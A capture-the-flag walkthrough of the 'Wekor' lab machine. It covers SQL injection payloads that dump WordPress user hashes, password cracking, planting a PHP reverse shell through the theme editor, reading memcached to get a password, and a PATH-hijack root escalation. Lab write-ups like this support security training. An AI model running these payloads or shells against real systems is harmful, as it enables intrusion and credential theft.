Wekor

ad8373f374f4983a7940db9b86efeb85.png

Target IP: 10.10.56.145
Challenge Description:
c3021512a5bf2fb23a140aa0601c9408.png


Reconnaissance

0cde819207e796fd14b62feaaff149f2.png
Performing a port scan shows there are two TCP ports open on the target machine: SSH and HTTP, as shown above.

2b61e763aca191827d2dad785481b66d.png
Doing an aggressive port scan against the open TCP ports returns the result above. From the scan above, the robots.txt contains interesting entries. I will start enumeration with the HTTP application on port 80.

119a8274fc71b9a8aa055a9d75fed5cd.png
I performed a VHOST scan using the command ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.wekor.thm" -u http://wekor.thm -fs 23 and obtained the interesting subdomain called site.

8e45d8ef2579f5b80686c29c383ef00e.png
I modified my /etc/hosts file. It contains the entry above for this machine.


Enumeration

Port 80: HTTP (wekor.thm)
41848faf46d860a6d608d228a24eb45b.png
The webpage above is displayed for this web application.

ef79dbe9bdbfcec93b8e95b91e89fa3e.png
From previous nmap scan, it identified the robots.txt. The entries above are included in this robots.txt file.

397a89f95b449d096249c121aeb2b2f4.png
I notice only /comingreallysoon is accessible from the /robots.txt. The webpage above is displayed for this directory. The message above informs me to browse to /it-next.

0ecbdde3961465c9a81bdbd3638ef6ec.png
And browsing to http://wekor.thm/it-next/ displays the website above.

9a701b9e6df7b0cde49d6e1eb5aa5547.png
Browsing to Shop and then Shopping Cart displays the webpage above. There is an input box that users can enter the coupon code. I tested this input box for SQL injection using the payload ' and got a hit, as shown above. The error message shown above means this application is vulnerable to SQL injection.

ebf503b9adec8b6ae21f2ec950af6bb7.png
I tested the payload ' OR '1'='1' -- // and received the output above. There is a valid coupon with the code 12345. By the looks of it, there are three columns in total for this table. I tested the number of columns and found the payload 12345' ORDER BY 3 -- // works the best, as any bigger than three columns throws the error message Unknown column '4' in 'order clause'. And now I can enumerate the application further using this valid coupon code.

4bbe77cd1b6f4d9b17095ba47c84d082.png
Using the payload 12345' UNION SELECT user(), database(), @@version -- //, I obtained more information about the target machine. The MySQL is being run by root@localhost, current database name is coupons, and 5.7.32-0ubuntu0.16.04.1 is the application version of MySQL.

71288e84dea5d0429e170443b127e4b8.png
Using the payload 12345' UNION SELECT table_name, table_catalog, table_schema from information_schema.tables -- //, I identified the different tables. The most interesting table I obtained is wp_users inside wordpress database, as shown above. Does this table contain sensitive information?

dadf85dc655244a8a6d84e9245e76caf.png
From previous knowledge, I know the different column names used in wp_users by Wordpress. I used this to craft the payload
12345' UNION SELECT user_email, user_pass, user_login from wordpress.wp_users -- //. And sending the payload gives me the crucial information about the different users of the Wordpress application users as shown above. I now have the emails, usernames, and passwords of the four different users.

99dc366f17d355394c3f16fa1b634eae.png
I copied the password hashes of the four users and saved them in a file called hash on my machine. Then using john, I cracked only the three out of four password hashes as shown above. Maybe these credentials will become useful later? Time to find where the Wordpress application is now.

Port 80: HTTP (site.wekor.thm)
e9ce00242dae905062f8c7fa5cf17150.png
Browsing to http://site.wekor.thm displays the webpage above. The message above mentions there will be a website soon in two weeks. The username Jim is interesting.

daa3da3c0db6a2ece0108c5c4c4ff297.png
Doing a directory search shows the /wordpress entry. I am guessing this is the website that was mentioned at http://site.wekor.thm.

c219e455f71b9929da5638074bb38ba7.png
And browsing to http://site.wekor.thm/wordpress/ displays the Wordpress webpage above.

ce6f468921be9c570042ce1ec482f7cb.png
I browsed to http://site.wekor.thm/wordpress/wp-admin/ to login, as I already have the credentials. I successfully logged in with the three credentials. However, the user wp_yura with the password soccer13 has administrator privileges as shown above.


Exploitation

556f9f55177c99de62760d184d161063.png
Since this user has administrator privileges, I used the Theme Editor feature to upload my webshell. I replaced the 404.php file of the theme Twenty Seventeen with PHP Pentest Monkey, as shown above. And then I started a listener on port 8443 on my machine.

726aca93f3bdc4e0f360fd98a5a6fd1f.png
To activate the reverse shell connection, I browsed to http://site.wekor.thm/wordpress/wp-content/themes/twentyseventeen/404.php. And then I obtained a reverse shell connection with the session as www-data. Now I have a foothold on the target machine.


Privilege Escalation

bd2ebf45fd4854cf59d82fdc3efce9ab.png
I obtained the credentials of the MySQL application. I logged into the MySQL application at port 5072 using the command mysql -u root -P 5072 -p, but I did not find anything useful here.

126e1f221a85a899ecfe70a6b4e75972.png
Running ss -tuln shows the active services on the localhost. The service running on port 11211 seems interesting. Doing a Google search for port 11211 gave me this useful article.

b88a58d6edada9f20e02b13921023e61.png
I used the command echo "version" | nc -vn -w 1 127.0.0.1 11211 from the previous article to obtain the version number. And I obtained the result VERSION 1.4.25 Ubuntu! This is perfect as the target machine seems to be running memcache.

a16a0f2dd7beb7746abb56a05fae0385.png
Using the commands from this article, I managed to obtain the password OrkAiSC00L24/7$ of the user Orka as shown above. I managed to successfully elevate privileges horizontally from the user www-data to Orka by switching to user Orka via su and the new password.

8d1869067155a7a3d5936b2f117707af.png
Running sudo -l shows the interesting command above. This user has two interesting files in their desktop directory: bitcoin and transfer.py. The first file is a binary executable file. Running strings on this file contains the password password.

365215185f39da3ff1603f04e002e3f8.png
The script transfer.py contains the code shown above. This code looks a bit similar to the way the binary bitcoin executes. Maybe I can perform module hijacking?

2029254152472aebb0aca818037a59ef.png
I notice I can make changes inside /usr/sbin. This is where I create the malicious fake version of Python, as shown above. It contains /bin/bash. Then I made this file to be executable by changing its permission.

dc29af2de8046f229ac4000e94ba26fb.png
Then running the command sudo -u root /home/Orka/Desktop/bitcoin starts the application normally. After execution, it opens a bash shell with root privileges as shown above. Now I have root access on the target machine.


Flags

ef1c208f87b08697517974ffaf05ad55.png
The user.txt flag is shown above.

072daf2c64451d8a46bff9be0e655055.png
The root.txt flag is shown above.